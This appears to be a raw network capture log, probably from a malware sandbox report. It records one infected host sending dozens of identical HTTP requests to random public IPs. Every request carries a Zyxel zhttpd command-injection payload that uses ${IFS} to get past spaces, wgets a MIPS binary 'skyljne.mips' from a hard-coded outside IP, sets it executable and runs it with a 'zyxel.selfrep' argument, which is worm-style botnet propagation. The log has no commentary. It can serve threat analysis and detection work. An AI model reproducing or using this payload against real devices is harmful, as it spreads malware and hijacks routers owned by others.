                                          Jan 14, 2024 15:46:34.397816896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8741192.168.2.234881888.249.249.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.397846937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8742192.168.2.2356156133.139.201.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.397896051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8743192.168.2.234358032.15.178.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.397907019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8744192.168.2.2335334109.156.151.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.397938967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8745192.168.2.234903250.134.70.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.397999048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8746192.168.2.2342758213.95.198.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.398020983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8747192.168.2.234054839.206.156.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.398051977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8748192.168.2.23526781.112.218.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.398056984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8749192.168.2.233279683.93.239.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.398123026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8750192.168.2.234129257.98.162.170443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.398154974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8751192.168.2.2355738145.71.203.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.398175001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8752192.168.2.2341618175.128.68.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.398197889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8753192.168.2.2358924152.150.202.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.398267031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8754192.168.2.2358638154.157.154.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.398303032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8755192.168.2.2336934163.180.196.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.398319960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8756192.168.2.2355556191.67.134.143443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.398423910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8757192.168.2.235612213.98.111.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.398487091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8758192.168.2.2337744156.236.255.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.398546934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8759192.168.2.234470891.206.204.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.398601055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8760192.168.2.2339900141.52.124.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.398622036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8761192.168.2.2346142151.235.82.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.398658991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8762192.168.2.2336918148.84.219.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.398710012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8763192.168.2.234957664.171.98.101443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.398758888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8764192.168.2.23590168.92.174.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.398796082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8765192.168.2.2356356200.88.71.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.398859978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8766192.168.2.2347422185.141.113.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.398879051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8767192.168.2.2335914115.125.70.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.398935080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8768192.168.2.234823661.196.2.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.398984909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8769192.168.2.2350132110.95.176.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.399022102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8770192.168.2.234140480.165.31.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.399060011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8771192.168.2.2347762181.14.47.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.399091959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8772192.168.2.2349730209.61.44.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.399137020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8773192.168.2.2338862168.14.188.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.399183035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8774192.168.2.2344370185.157.166.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.399239063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8775192.168.2.234186077.21.51.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.399255037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8776192.168.2.233915074.206.175.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.399315119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8777192.168.2.2343916101.68.127.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.399364948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8778192.168.2.235478444.112.16.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.399393082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8779192.168.2.2342118205.45.200.190443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.399466038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8780192.168.2.233835290.249.6.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.399503946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8781192.168.2.2333832158.73.2.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.399543047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8782192.168.2.2346484192.182.254.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.399570942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8783192.168.2.235843090.252.171.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.399616957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8784192.168.2.2353852158.110.233.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.399631023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8785192.168.2.235809296.86.15.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.399698019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8786192.168.2.235094669.3.40.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.399748087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8787192.168.2.2345846172.43.185.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.399790049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8788192.168.2.2348748144.102.68.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.399837017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8789192.168.2.235139468.83.27.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.399893045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8790192.168.2.2353358136.89.10.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.399915934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8791192.168.2.235868089.82.251.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.399977922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8792192.168.2.2358222196.57.95.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.400013924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8793192.168.2.235160249.8.214.170443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.400059938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8794192.168.2.233928471.75.231.229443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.400079012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8795192.168.2.235555049.147.96.190443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.400120974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8796192.168.2.235405263.20.226.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.400155067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8797192.168.2.235780463.211.59.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.400199890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8798192.168.2.235981698.52.42.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.400226116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8799192.168.2.2341622159.20.154.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.400262117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8800192.168.2.234212423.29.75.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.400326014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8801192.168.2.234799671.75.207.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.400358915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8802192.168.2.2342934145.196.194.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.400389910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8803192.168.2.235093435.75.119.71443
                                          TimestampBytes transferredDirectionData
